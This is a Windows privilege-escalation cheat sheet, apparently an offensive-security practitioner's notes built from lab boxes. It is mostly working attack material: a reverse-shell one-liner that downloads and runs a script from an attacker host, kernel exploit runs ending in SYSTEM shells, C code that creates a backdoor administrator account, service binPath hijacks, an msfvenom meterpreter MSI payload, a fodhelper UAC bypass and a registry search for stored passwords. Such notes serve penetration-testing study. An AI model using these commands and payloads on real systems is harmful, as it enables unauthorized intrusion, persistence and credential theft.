Skip to content

Windows Privilege Escalation

Upgrade Shell

Fully interactive reverse shell on Windows

Server Side

stty raw -echo; (stty size; cat) | sudo nc -lvnp myport

Client Side

powershell IEX(IWR http://myip/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell myip myport

File Invoke-ConPtyShell.ps1

User Enumeration

Current User

whoami
net user <username>
whoami /groups

Other Users

net user
net localgroup administrators

Hostname

hostname

Installed and Patch Levels

wmic product get name, version, vendor
dir "C:\Program Files"
dir "C:\Program Files (x86)"

Patch Levels

wmic qfe get Caption, Description, HotFixID, InstalledOn

Device Drivers & Kernel Modules

Using powershell >>>

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated

OS & Architecture & Driver

OS & Architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Driver Enumeration

driverquery /v

6.3.9600 Kernel-Mode Drivers

C:\Users\kostas\Desktop>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based

https://github.com/leecybersec/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

C:\inetpub\drupal-7.54>ms15-051x64.exe "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"
ms15-051x64.exe "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1076 created.
==============================
$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.9] 53968
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

CVE-2015-1701

6.3.9600 rgnobj Integer O-flow

C:\Users\kostas\Desktop>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

https://github.com/leecybersec/walkthrough/tree/master/hackthebox/006-optimum_httpfileserver-2.3_ms16-098-6.3.9600#rgnobj-integer-overflow

6.1.7600 Ancillary Func Driver

https://www.exploit-db.com/exploits/40564

c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
c:\Users\Public>40564.exe
40564.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Vulnerability in Ancillary Function Driver

Windows MS11-046 kernel

c:\Windows\System32>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001

https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046

C:\wamp\www>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Scheduled Tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /B /C:"Task To Run" /C:"Next Run Time" /C:"Last Run Time" /C:"Schedule Type" /C:"Start Time" /C:"Start Date"

Readable/Writable

Using accesschk

accesschk.exe -accepteula
accesschk.exe -uws <user> "C:\Program Files"

Using powershell

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Get-ChildItem "C:\Users\windows_10_1903_x64\Desktop" -Recurse | Get-ACL | findstr /C:"<user-name>"

Processes and Services

tasklist /SVC

Active network connection

netstat -ano

Insecure File Permissions

Get Server and Path to running

Powershell >>>

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\Windows\system32\wbem\WmiApSrv.exe"

icacls

Mask Permissions
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access

Overwrite file if have F or W permission.

i686-w64-mingw32-gcc adduser.c -o adduser.exe
#include <stdlib.h>

int main ()
{
    int add;
    add = system ("net user backup Adm1nP@ssWD /add");
    add = system ("net localgroup administrators backup /add");
    return 0;
} 

Move file adduser.exe

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"

Check StartMode for service

wmic service where caption="Serviio" get name, caption, state, startmode

==> StartMode: Auto

Check rights for restart system

whoami /priv

Restart system

shutdown /r /t 0

Check Administrators group

net localgroup Administrators

Insecure Service Permissions

sc qc "service"
accesschk64.exe -uwcqv <user> *

==> Service All Access or Service Change Config

sc config "service" binPath= "net localgroup administrators user /add"
sc config "service" binPath= "c:\users\public\shell.exe"
sc stop "service"
sc start "service"

https://asfiyashaikh.medium.com/windows-privesc-weak-service-permission-b90f3bf4d44f

https://medium.com/@orhan_yildirim/windows-privilege-escalation-insecure-service-permissions-e4f33dbff219

Leveraging Unquoted Paths

wmic service get displayname,pathname
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

Binaries That AutoElevate

AlwaysInstallElevated

https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated

Enum commands

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Exploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 -f msi > /root/Desktop/1.msi
msiexec /quiet /qn /i 1.msi

Bypass UAC registry hijacking

Check Mandatory Level

whoami /groups

Run cmd.exe as Administrator to get High Mandatory Level

powershell.exe Start-Process cmd.exe -Verb runAs

C:\Windows\System32\fodhelper.exe

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\windows_10_1903_x64\Desktop\shell.exe" /f

Unmounted Disks

mountvol

Networking Enumeration

ipconfig /all
route print

Firewall Status and Rules

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Enumeration Tools

windows-privesc-check

windows-privesc-check2.exe --help

winPEASexe

winPEASx86.exe

More commands

Add Local Admin User

net user /add <user> <pass>
net localgroup administrators <user> /add

Run CMD as Admin

powershell.exe Start-Process cmd.exe -Verb runAs

Clear text stored

reg query HKLM /f pass /t REG_SZ /s